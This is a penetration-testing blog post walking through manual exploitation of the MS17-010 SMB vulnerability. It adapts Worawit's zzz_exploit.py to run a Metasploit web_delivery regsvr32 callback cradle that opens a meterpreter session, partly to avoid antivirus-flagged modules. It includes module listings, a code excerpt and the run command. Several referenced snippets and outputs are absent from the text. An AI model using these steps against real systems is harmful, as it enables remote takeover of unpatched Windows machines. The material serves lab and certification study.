MS17-010: Python

Tuesday, December 25, 2018

Introduction

MS17-010 is an exploit developed by the NSA. It is an attack against the SMBv1 protocol and was leaked in April 2017 by the Shadow Brokers. A full breakdown of MS17-010 can be found here.

SMB Vulnerabilities

With MS17-010, its very easy to hit a box and get SYSTEM. It has made pen-testers lives much, much, easier. Searching MS17-010 in Metasploit will display the following:

msf > search ms17

Matching Modules
================

   Name                                                   Disclosure Date  Rank     Check  Description
   ----                                                   ---------------  ----     -----  -----------
   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Here, there are a lot of modules. Most of them have had their signatures hammered and will most likely be caught by any AV. Or, if this exploit is in the context of OSCP, then you aren’t allowed to use these modules.

To avoid using these modules, Worawit wrote a PoC in Python which will be updated and edited through this blog.

As of writing this, the script is able to exploit:

- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86

Worawit put out a GitHub repository full of proof-of-concept code and useful scripts. The note worthy ones are checker.py and zzz_exploit.py. zzz_exploit.py is the script that will be modified slightly to enable more manual exploitation of MS17-010 and should allow for the exploitation of the previously mentioned Windows variants.

All credit goes to Korey Mckinley and his article, small adjustments were made to this to suit my current set up.

Metasploit

The easiest way to do this with metasploit, is to use the exploit/multi/script/web_delivery module. This module has multiple methods for calling back to the attacker machine. However, this post will stick to regsvr32.

My Metasploit configuration looked like this:

This should produce an execution cradle that looks like this:

zzz_exploit.py

Armed with the regsvr32 execution cradle, clone Worawit’s repo. Open up zzz_exploit.py and move to Line 972 or search for the smb_pwn function.

The first few lines of this function will create a pwned.txt on the C:\. This isnt required, so comment out the following:

print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C/pre>)
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)

Underneath that, there will be an example use of service_exec function. Uncomment this and switch out the payload for the payload generated by web_delivery. The function should now look similar to this:

The function has now been updated to contain the execution cradle. Run the script against the specified host with python zzz_exploit.py 192.168.0.35.

If everything went well, then it should look something like this:

regsvr32 is calling back and collecting the payload and the meterpreter session being created.

To avoid using metasploit all together, Shelby can be used to generate various cradles and shells.

Since writing this post, I have modified the code to allow for an easier user experience, it can be found here.

References

  1. Worawit: Twitter
  2. Worawit: GitHub
  3. Korey McKinley: Manually Exploiting MS17-010
  4. Regsvr32 Microsoft Documents
  5. Checkpoint Research: MS17-010 Analysis
WindowsSMBExploitationInitial AccessShelby

AllTheUsers!